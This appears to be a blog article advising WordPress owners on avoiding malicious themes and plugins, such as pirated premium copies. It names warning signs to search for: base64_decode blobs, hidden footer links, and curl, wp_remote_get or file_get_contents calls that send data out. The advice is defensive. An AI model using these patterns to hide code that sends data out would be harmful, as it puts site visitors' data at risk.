WordPress website can’t work without plugins or themes. Well, you don’t need plugins, but in most cases WordPress alone is not enough. Choosing, downloading and using both themes and plugins may look as a simple task, but with increased popularity of WordPress it’s not anymore.
Millions of websites run on WordPress, and that makes WordPress and everything related to it great target for hackers to exploit security holes and to plant some of their own into plugins and themes. Every now and them you hear that some plugin is used by hackers to get access to websites or to send users data to a remote website. Similar methods are used by themes. Themes are also used to plant spam links into header and footer of websites using encoded content (base64 or some other method). Some themes also had a malicious code that was able to replicate itself to other themes installed on the website.
Preventing something like that happening to you is not very complicated, and it requires that you only be careful where you get the plugins and themes, and what are you installing on your website.
Find and download themes and plugins
Best source for free themes and plugins is main WordPress website (wordpress.org). Themes uploaded there are always scanned prior to publishing to make sure that malicious code is not embedded. When the plugins in the repository are concerned, it’s not nowhere near as strict as the themes, and plugins are removed only if multiple users report plugin as problematic. Over the years, there were cases of plugins uploaded to repository that where malicious in nature, but they are always quickly removed. Still, plugins repository needs a massive overhaul to make it up to date (90% of plugins are not compatible with latest WordPress versions, they are not maintained and they are not tested). But, as a source of free plugins that is the best way to get plugins.
If you don’t download plugins or themes from there, you must make sure to get plugins and themes directly from their authors websites. Be careful downloading them from some third-party website. Free plugins are not big problem, but premium (or commercial if you like) plugins and themes are usually target of hackers. They get them illegally, change them and offer for free from their websites or other warez forums or sources. All commercial themes developers were affected over the years, and their themes end up on such websites, and always include some sort of malicious code.
Check what you have downloaded
Before you upload theme or plugin on your website, test it on your local computer. Also, you can search files in theme or plugin for a code that is potentially problematic. This is easier to do in the theme than plugin, since plugin can have not only more files, but there are legitimate reasons to use some functions that may be considered problematic.
Any theme file can be affected, but most common files to be infected are: functions.php, footer.php and header.php. Encoded content is usually recognized by use of base64_decode function that contains long string that doesn’t make any sense on its own. Also, footer or header can contain long lists of links that are displayed as hidden. There is a free plugin called Theme Authenticity Checker, and you can use it to scan themes you have installed to find malicious code or links that shouldn’t be there.
There are several ways that plugins and themes can send data to remote servers. That can also be a big security concern and check if curl functions are used, functions like wp_remote_get or file_get_contents. Checking for that requires that you are familiar with PHP and WordPress development.
Be careful what you add to your website, make sure to get plugins and themes from authors or some reputable source like official WordPress repository. Spend some time to test what you have download.